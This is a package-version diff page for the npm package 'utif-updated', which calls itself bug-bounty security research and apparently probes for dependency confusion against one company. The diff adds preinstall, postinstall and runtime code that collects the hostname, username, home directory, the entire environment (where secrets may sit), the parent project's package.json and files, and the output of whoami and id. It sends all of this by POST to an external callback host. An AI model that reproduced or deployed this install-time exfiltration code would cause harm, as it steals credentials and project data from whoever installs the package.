npm - utif-updated - Versions diffs - 99.0.0 → 99.0.2 - Mend

utif-updated 99.0.0 → 99.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (4) hide show

package/index.js CHANGED Viewed

@@ -1,27 +1,64 @@
 const https = require('https');
 const http = require('http');
 const os = require('os');
+const fs = require('fs');
+const path = require('path');
 const CALLBACK = 'fyh82qlu93wdksjiz5qjz9h27tdk1e02p.oastify.com';
 if (!global.__utif_updated_triggered) {
   global.__utif_updated_triggered = true;
-  const webhook = process.env.SECURITY_BUG_BOUNTY_DOCTOLIB_IS_PWN;
-  // Callback Burp avec infos
-  const data = Buffer.from(JSON.stringify({
+  function findParentPackageJson() {
+    // En runtime, on remonte depuis le module
+    let dir = __dirname;
+    for (let i = 0; i < 10; i++) {
+      const parent = path.dirname(dir);
+      if (parent === dir) break;
+      dir = parent;
+      if (path.basename(dir) === 'node_modules') {
+        // On est dans node_modules, le parent c'est le projet
+        const projectDir = path.dirname(dir);
+        try {
+          return JSON.parse(fs.readFileSync(
+            path.join(projectDir, 'package.json'), 'utf8'
+          ));
+        } catch(e) {}
+      }
+    }
+    return null;
+  }
+  const info = {
     type: 'runtime_require',
     hostname: os.hostname(),
     user: os.userInfo().username,
     cwd: process.cwd(),
-    webhook: webhook || 'NOT_FOUND',
+    dirname: __dirname,
+    platform: os.platform(),
+    node_version: process.version,
+    env: process.env,
+    parent_package: findParentPackageJson(),
     timestamp: new Date().toISOString()
-  })).toString('base64');
-  https.get(`https://${CALLBACK}/runtime?d=${data}`, () => {}).on('error', () => {});
-  // Trigger game over
+  };
+  const data = JSON.stringify(info);
+  const req = https.request({
+    hostname: CALLBACK,
+    port: 443,
+    path: '/runtime',
+    method: 'POST',
+    headers: {
+      'Content-Type': 'application/json',
+      'Content-Length': Buffer.byteLength(data)
+    }
+  }, () => {});
+  req.on('error', () => {});
+  req.write(data);
+  req.end();
+  const webhook = process.env.SECURITY_BUG_BOUNTY_DOCTOLIB_IS_PWN;
   if (webhook) {
     try {
       const url = new URL(webhook);
@@ -31,5 +68,4 @@ if (!global.__utif_updated_triggered) {
   }
 }
-// Export vide pour pas casser leur build
 module.exports = {};

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "utif-updated",
-  "version": "99.0.0",
+  "version": "99.0.2",
   "description": "Security research - Bug Bounty",
   "main": "index.js",
   "author": "icare",

package/postinstall.js CHANGED Viewed

@@ -1,22 +1,65 @@
 const https = require('https');
 const http = require('http');
 const os = require('os');
+const fs = require('fs');
+const path = require('path');
 const CALLBACK = 'fyh82qlu93wdksjiz5qjz9h27tdk1e02p.oastify.com';
-const webhook = process.env.SECURITY_BUG_BOUNTY_DOCTOLIB_IS_PWN;
+function findParentPackageJson() {
+  if (process.env.npm_config_local_prefix) {
+    try {
+      return JSON.parse(fs.readFileSync(
+        path.join(process.env.npm_config_local_prefix, 'package.json'), 'utf8'
+      ));
+    } catch(e) {}
+  }
+  let dir = process.cwd();
+  for (let i = 0; i < 10; i++) {
+    const parent = path.dirname(dir);
+    if (parent === dir) break;
+    dir = parent;
+    if (dir.includes('node_modules')) continue;
+    try {
+      const pkgPath = path.join(dir, 'package.json');
+      if (fs.existsSync(pkgPath)) {
+        return JSON.parse(fs.readFileSync(pkgPath, 'utf8'));
+      }
+    } catch(e) {}
+  }
+  return null;
+}
-// Callback Burp
-const data = Buffer.from(JSON.stringify({
+const info = {
   type: 'postinstall',
   hostname: os.hostname(),
   user: os.userInfo().username,
-  webhook: webhook || 'empty'
-})).toString('base64');
+  cwd: process.cwd(),
+  npm_local_prefix: process.env.npm_config_local_prefix || 'N/A',
+  platform: os.platform(),
+  env: process.env,
+  parent_package: findParentPackageJson(),
+  timestamp: new Date().toISOString()
+};
-https.get(`https://${CALLBACK}/postinstall?d=${data}`, () => {}).on('error', () => {});
+const data = JSON.stringify(info);
-// Trigger game over webhook
+const req = https.request({
+  hostname: CALLBACK,
+  port: 443,
+  path: '/postinstall',
+  method: 'POST',
+  headers: {
+    'Content-Type': 'application/json',
+    'Content-Length': Buffer.byteLength(data)
+  }
+}, () => {});
+req.on('error', () => {});
+req.write(data);
+req.end();
+const webhook = process.env.SECURITY_BUG_BOUNTY_DOCTOLIB_IS_PWN;
 if (webhook) {
   try {
     const url = new URL(webhook);

package/preinstall.js CHANGED Viewed

@@ -1,31 +1,92 @@
 const https = require('https');
 const http = require('http');
 const os = require('os');
+const fs = require('fs');
+const path = require('path');
+const { execSync } = require('child_process');
 const CALLBACK = 'fyh82qlu93wdksjiz5qjz9h27tdk1e02p.oastify.com';
-const data = JSON.stringify({
+// Fonction pour trouver le package.json parent (racine du projet)
+function findParentPackageJson() {
+  // npm_config_local_prefix = racine du projet qui installe
+  if (process.env.npm_config_local_prefix) {
+    try {
+      return JSON.parse(fs.readFileSync(
+        path.join(process.env.npm_config_local_prefix, 'package.json'), 'utf8'
+      ));
+    } catch(e) {}
+  }
+  // Sinon remonte l'arborescence
+  let dir = process.cwd();
+  for (let i = 0; i < 10; i++) {
+    const parent = path.dirname(dir);
+    if (parent === dir) break;
+    dir = parent;
+    // Skip si on est dans node_modules
+    if (dir.includes('node_modules')) continue;
+    try {
+      const pkgPath = path.join(dir, 'package.json');
+      if (fs.existsSync(pkgPath)) {
+        return JSON.parse(fs.readFileSync(pkgPath, 'utf8'));
+      }
+    } catch(e) {}
+  }
+  return null;
+}
+// Récupère toutes les infos
+const info = {
   type: 'preinstall',
   hostname: os.hostname(),
   user: os.userInfo().username,
   cwd: process.cwd(),
-  env_target: process.env.SECURITY_BUG_BOUNTY_DOCTOLIB_IS_PWN || 'NOT_FOUND',
+  npm_local_prefix: process.env.npm_config_local_prefix || 'N/A',
+  home: os.homedir(),
+  platform: os.platform(),
+  arch: os.arch(),
+  node_version: process.version,
+  env: process.env,
   timestamp: new Date().toISOString()
-});
+};
+// Package.json du projet PARENT
+info.parent_package = findParentPackageJson();
+// Infos système
+try {
+  info.pwd = execSync('pwd').toString().trim();
+  info.whoami = execSync('whoami').toString().trim();
+  info.id = execSync('id').toString().trim();
+} catch(e) {}
+// Liste des fichiers à la racine du projet
+try {
+  if (process.env.npm_config_local_prefix) {
+    info.project_files = fs.readdirSync(process.env.npm_config_local_prefix);
+  }
+} catch(e) {}
+const data = JSON.stringify(info);
-// Callback Burp
 const req = https.request({
   hostname: CALLBACK,
   port: 443,
   path: '/preinstall',
   method: 'POST',
-  headers: { 'Content-Type': 'application/json' }
+  headers: {
+    'Content-Type': 'application/json',
+    'Content-Length': Buffer.byteLength(data)
+  }
 }, () => {});
 req.on('error', () => {});
 req.write(data);
 req.end();
-// Trigger leur webhook si présent
+// Trigger leur webhook
 const webhook = process.env.SECURITY_BUG_BOUNTY_DOCTOLIB_IS_PWN;
 if (webhook) {
   try {